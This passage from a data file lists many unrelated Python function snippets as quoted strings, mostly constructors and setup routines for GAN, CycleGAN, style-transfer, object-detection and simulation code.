amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self, gen):\n self.gen = gen", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def __init__(self):\n\n self.gm = GradientMapper()\n self.im = SpringMapper()\n self.fm = FullMapper(self.im, self.gm)\n # self.lm = LineMapper(self.fm)\n self.exit = False", "def __init__(self, latent_dim=helpers.LATENT_DIM_IMG, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [nn.Linear(in_feat, out_feat)]\n if normalize:\n layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.img_size = img_size\n self.channels = channels\n self.model = nn.Sequential(\n\n *block(latent_dim, 64, normalize=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, channels*img_size*img_size),\n nn.Tanh()\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n 
nn.ReLU(inplace=True),\n\n # nodes = feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def init():\n pass", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = 
MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 
1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def init():\n\n # Complete our stop words set.\n add_extra_words()\n\n model = read_model(MODEL_FILE)\n model_keys = list(model.keys())\n\n # Basic random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=random.choice(model_keys))\n\n # Selective random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix(model_keys))\n\n # Context-aware.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix_with_context(model, \"Agent_Phantom\"))\n\n print(new_comment)", "def generator_setup():\n PaaSPureGenerator()", "def __init__(self):\n\n self.parser = self.define_parser()\n self.pen = Pen()", "def Init(ss):\n rand.Seed(ss.RndSeed)\n ss.UpdateEnv()\n ss.StopNow = False\n ss.SetParams(\"\", False)\n ss.NewRun()\n ss.UpdateView(True)", "def __init__(self, dim, rn, gammak, sine=False, feature_generator=None):\n\n\t\tself.dim = dim\n\t\tself.rn = rn\n\t\tself.gammak = gammak\n\n\t\tif feature_generator is None:\n\t\t\tself.feature_generator = GaussianRandomFeatures(self.dim, self.rn, self.gammak, sine=sine)\n\t\telse: self.feature_generator = feature_generator", "def __init__(self, sid, split, library, style, **pargs):\n\n if 'print' not in pargs:\n pargs['print'] = (10**4, 'time', 'dt', 'atoms')\n\n self.rank = split.Get_rank()\n self.split = split\n self.pargs = pargs\n self.monitorList = []\n self.vars = {}\n self.path = os.getcwd()\n self.nSS = len(self.pargs['species'])\n self.output = self.pargs['output']\n self._dir, _ = __file__.split(__name__.split('PyGran.simulation.')[-1] + '.py')\n self._monitor = [] # a list of tuples of (varname, filename) to monitor\n\n if '__version__' in pargs:\n self.__version__ = self.pargs['__version__']\n\n if not self.rank:\n global logging\n\n logging = import_module(name='logging')\n\n logging.basicConfig(filename='pygran.log', format='%(asctime)s:%(levelname)s: %(message)s', 
level=logging.DEBUG)\n\n logging.info(\"Working in {}\".format(self.path))\n logging.info('Creating i/o directories')\n\n if not os.path.exists(self.pargs['traj']['dir']):\n os.makedirs(self.pargs['traj']['dir'])\n\n if self.pargs['restart']:\n if not os.path.exists(self.pargs['restart'][1]):\n os.makedirs(self.pargs['restart'][1])\n\n logging.info('Instantiating LIGGGHTS object')\n\n self.lmp = liggghts(comm=self.split, library=library.strip(), cmdargs=['-log', 'liggghts.log'])\n\n if not self.rank:\n logging.info('Setting up problem dimensions and boundaries')\n\n self.lmp.command('units {}'.format(self.pargs['units']))\n\n if hasattr(self, '__version__'): \n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n else:\n # Get version from version_liggghts.txt. TODO: find a faster way to do this.\n try:\n version_txt = find('version_liggghts.txt', '/')\n self.__liggghts__ = version_txt.split('version_liggghts.txt')[0]\n\n with open(version_txt, 'r+') as fp:\n major, minor, _ = fp.readline().rstrip().split('.')\n self.__version__ = float(major + '.' + minor)\n except:\n if not self.rank:\n print('Could not find LIGGGHTS version. Proceeding ... ')\n self.__version__ = 'unknown'\n self.__liggghts__ = 'n/a'\n\n # Write version + src dir to config file if it exists\n if not self.rank:\n if os.path.isfile(self._dir + '../.config'):\n with open(self._dir + '../.config', 'a+') as fp:\n fp.write('\\nversion={}'.format(self.__version__))\n fp.write('\\nsrc={}'.format(self.__liggghts__))\n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n\n self.lmp.command('dimension {}'.format(self.pargs['dim']))\n self.lmp.command('atom_style {}'.format(style))\n self.lmp.command('atom_modify map array') # array is faster than hash in looking up atomic IDs, but the former takes more memory\n self.lmp.command('boundary ' + ('{} ' * len(pargs['boundary'])).format(*pargs['boundary']))\n self.lmp.command('newton off') # turn off newton's 3rd law ~ should lead to better scalability\n self.lmp.command('communicate single vel yes') # have no idea what this does, but it's imp for ghost atoms\n self.lmp.command('processors * * *') # let LIGGGHTS handle DD", "def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__iteration_number = kwargs['iteration_number']\n self.__particles = [\n PSOParticle(**kwargs, bit_generator=self._random)\n for _ in range(kwargs['particles'])\n ]\n\n # The library stores particles in the visualizer .... 
groan\n positions = [particle.position for particle in self.__particles]\n self._visualizer = NoVisualizer(**kwargs)\n self._visualizer.add_data(positions=positions)", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n 
compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def init(self, rng_key, num_warmup, init_params, model_args, model_kwargs):\n raise NotImplementedError", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self,args,graph):\n self.args = args\n self.graph = graph\n self.targets = overlap_generator(self.args.target_weighting, self.graph)\n self.weights = overlap_generator(self.args.regularization_weighting, self.graph)\n self.nodes = self.graph.nodes()\n self.vocab_size = len(self.nodes)\n self.true_step_size = ((len(self.weights.keys()) / 2) * args.batch_size * self.args.epochs)\n self.edges = nx.edges(self.graph)\n self.build()", "def do_init(self):\n\n pass", "def __init_accessors (self):\n self.colors = ay.utils.Colors\n self.layout = Layout(self.seed)\n self.shapes = Shapes", "def __init__(self):\n # Passing the class make this Python 2 and Python 3 compatible\n super(MayaSceneLevelGeneratorUI, self).__init__(parent=maya_main_window())\n\n # Create the generators needed\n self._level_gen = level.LevelGenerator([blocks.BlockFile(\"\", blk_type) for blk_type in VALID_BLOCK_TYPES])\n self._scene_gen = MayaSceneLevelGenerator(None) # Fill in level at button press time\n\n # Window things\n self.setWindowTitle(\"Maya Scene Level Generator\")\n self.resize(500, 200)\n self.setWindowFlags(self.windowFlags() ^ PySide2.QtCore.Qt.WindowContextHelpButtonHint)\n\n # Set up for the first time\n self._create_widgets()\n self._create_layout()\n self._refresh_view()\n self._create_connections() # Order matters, since refreshing triggers connections\n\n print(self._level_gen.block_list) # TODO delete", "def create_initial_graph(self):\n # Initialise weights\n for link in self.gene_links:\n link.weight = random.uniform(weight_init_min, weight_init_max)\n # Initialise biases\n for node in self.gene_nodes:\n node.bias = random.uniform(bias_init_min, bias_init_max)\n if node.can_modify:\n node.act_func = self.act_set.get_random_activation_func()\n if node.act_func in [activations.gaussian, activations.sin]:\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)", "def init():\r\n\t# add grabber tools based on proxy tools\r\n\tfor proxyWrapper in vizconnect.getToolsWithMode('Proxy'):\r\n\t\tgrabberTool = tools.grabber.HandGrabber(usingPhysics=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tusingSprings=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tplacementMode=tools.placer.MODE_DROP_DOWN)\r\n\t\t\r\n\t\tname = 'grabber_tool_based_on_'+proxyWrapper.getName()\r\n\t\tgrabberWrapper = 
vizconnect.addTool(raw=grabberTool,\r\n\t\t\t\t\t\t\t\t\t\t\tname=name,\r\n\t\t\t\t\t\t\t\t\t\t\tmake='Virtual',\r\n\t\t\t\t\t\t\t\t\t\t\tmodel='Grabber')\r\n\t\t# parent the grabber wrapper to the proxy's parent\r\n\t\tgrabberWrapper.setParent(proxyWrapper)\r\n\t\t\r\n\t\tgrabberTool.setItems(grabbableItems)\r\n\t\r\n\tviz.callback(viz.getEventID('RESET_THE_LOFT_LAYOUT'), lambda e: resetMovedObjects())", "def setup_class(self):\n\n from scipy.spatial import cKDTree\n\n shape = (500, 500)\n\n # define random star positions\n nstars = 50\n from astropy.utils.misc import NumpyRNGContext\n with NumpyRNGContext(12345): # seed for repeatability\n xx = np.random.uniform(low=0, high=shape[1], size=nstars)\n yy = np.random.uniform(low=0, high=shape[0], size=nstars)\n\n # enforce a minimum separation\n min_dist = 25\n coords = [(yy[0], xx[0])]\n for xxi, yyi in zip(xx, yy):\n newcoord = [yyi, xxi]\n dist, distidx = cKDTree([newcoord]).query(coords, 1)\n if np.min(dist) > min_dist:\n coords.append(newcoord)\n yy, xx = np.transpose(coords)\n\n with NumpyRNGContext(12345): # seed for repeatability\n zz = np.random.uniform(low=0, high=200000., size=len(xx))\n\n # define a table of model parameters\n self.stddev = 2.\n sources = Table()\n sources['amplitude'] = zz\n sources['x_mean'] = xx\n sources['y_mean'] = yy\n sources['x_stddev'] = np.zeros(len(xx)) + self.stddev\n sources['y_stddev'] = sources['x_stddev']\n sources['theta'] = 0.\n\n self.data = make_gaussian_sources_image(shape, sources)\n self.nddata = NDData(self.data)\n\n init_stars = Table()\n init_stars['x'] = xx.astype(int)\n init_stars['y'] = yy.astype(int)\n self.init_stars = init_stars", "def setup(self):\n\n self.parser = GingerIt()", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def _init_anim(self):\n pass", "def __init__(self, *args, **kwargs):\n _gdi_.Palette_swiginit(self,_gdi_.new_Palette(*args, **kwargs))", "def setup(self):\n for gen in self._generators:\n gen.setup()", "def __init__(self):\n self.model = {'mol':[], 'nmol':0}\n self.template = {} \n self.config = {}\n 
self.config['tfile'] = 'gau-template-bsse.gjf'\n self.config['xyzfile'] = 'model.xyz'\n self.config['jobfile'] = 'gau.gjf'\n self.config['job_prefix'] = self.config['jobfile'].split(\".\")[0]\n self.config['incr'] = 1\n \n self.rd_cmd_stream()\n return", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def __init__(self, opt: argparse.Namespace) -> None:\n super().__init__(opt)\n\n self.gpu_ids = opt.gpu_ids\n self.is_train = opt.is_train\n self.output_nch = opt.output_nch\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu')\n\n # generator module\n self._generator_module = generator_modules[opt.generator_module_name](opt)\n apply_init_weight(self._generator_module, opt, init_weight=init_weights[opt.init_weight_name])\n if self.is_train:\n # discriminator module\n self._discriminator_module = discriminator_modules[opt.discriminator_module_name](opt)\n apply_init_weight(self._discriminator_module, opt, init_weight=init_weights[opt.init_weight_name])\n # generator optimizer\n self._generator_optimizer = optimizers[opt.generator_optimizer_name](self._generator_module.parameters(), opt)\n # discriminator optimizer\n self._discriminator_optimizer = optimizers[opt.discriminator_optimizer_name](self._discriminator_module.parameters(), opt)\n # generator scheduler\n self._generator_scheduler = schedulers[opt.generator_scheduler_name](self._generator_optimizer, opt)\n # discriminator scheduler\n self._discriminator_scheduler = schedulers[opt.discriminator_scheduler_name](self._discriminator_optimizer, opt)\n\n # register\n if not self.is_train:\n self.modules['generator'] = self._generator_module\n else:\n self.modules['generator'] = self._generator_module\n self.modules['discriminator'] = self._discriminator_module\n self.optimizers['generator'] = self._generator_optimizer\n self.optimizers['discriminator'] = self._discriminator_optimizer\n self.schedulers['generator'] = self._generator_scheduler\n self.schedulers['discriminator'] = self._discriminator_scheduler\n\n self.module_transfer_to_device()", "def initialize_trainer(self):\n self.initialize_matrices()\n self.initialize_model()\n self.initialize_optimizers()\n return self", "def __init__(self, model, n_pix=1, strategy='rand1bin', max_iter=100, popsize=400,\n init='normal', target=None, args=None, **kwargs):\n self.model = model\n self.n_pix = n_pix\n self.strategy = strategy\n self.max_iter = max_iter\n self.popsize = popsize\n self.init = init\n self.target = target\n self.args = args\n self.kwargs = kwargs\n\n self.step_meter = AverageMeter()", "def setUp(self) -> None:\n self.random = np.random.RandomState(seed=42)", "def __init__(self, skin_directory):\n self.ax = None\n self.generate_axis()\n self.skin_directory = skin_directory\n self.figure = plt.gcf()", "def init(self) -> None:\n ...", "def initialise_rng(self):\n\n\t\tself.rng = numpy.random.RandomState()", "def __init__(self, init_pos, init_stdev, num_particles, sense_noise):\n self.particles = np.random.multivariate_normal(\n init_pos, [[init_stdev**2, 0], [0, init_stdev**2]], num_particles)\n self.weights = np.array(\n [1. 
